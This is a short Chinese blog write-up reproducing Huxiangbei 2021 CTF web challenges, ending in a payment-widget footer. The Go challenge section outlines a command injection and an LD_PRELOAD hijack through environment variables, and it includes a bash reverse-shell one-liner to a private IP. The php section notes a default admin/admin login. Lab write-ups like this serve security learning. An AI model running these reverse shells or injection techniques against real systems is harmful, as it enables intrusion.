[CTF复现]湖湘杯2021

go_web

今天又是学爆guoke哥哥博客的一天

0x01 MultistageAgency

通过看源码 我们发现 这个题是三个服务

su - web -c "/code/bin/web 2>&1  >/code/logs/web.log &"
su - web -c "/code/bin/proxy 2>&1  >/code/logs/proxy.log &"

/code/bin/server 2>&1  >/code/logs/server.log &
9090 暴露出来的web端口
8080 proxy
9091 内网服务 server 有权限readflag

那开始看源码

先看外网服务 两个路由

/token getToken 
{"success":"f0def9475b624655713b45f66448fe02","failed":""}
/upload 上传文件

image-20211213234527947

没什么屌用。 环境变量

command.Env = append(command.Env, fmt.Sprintf("%s=%s", k, values.Get(k)))

serever 路由

http.HandleFunc("/", getToken)     //设置访问的路由
http.HandleFunc("/manage", manage) //设置访问的路由
command := exec.Command("bash", "-c", cmd)

命令注入 现在要想办法访问他。

到这里 是外部web的访问路劲:

通过环境变量LD_PRELOAD 拦截到我们要的so,然后来弹个shell。然后用安洵的生成一下超级shell绕过,打内网就可以了。(注意编译so的时候 要使用linux环境)

bash -i >& /dev/tcp/192.168.76.1/8080 0>&1

image-20211214001600433

0x02 php

弱密码 admin admin

变量覆盖+include

评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值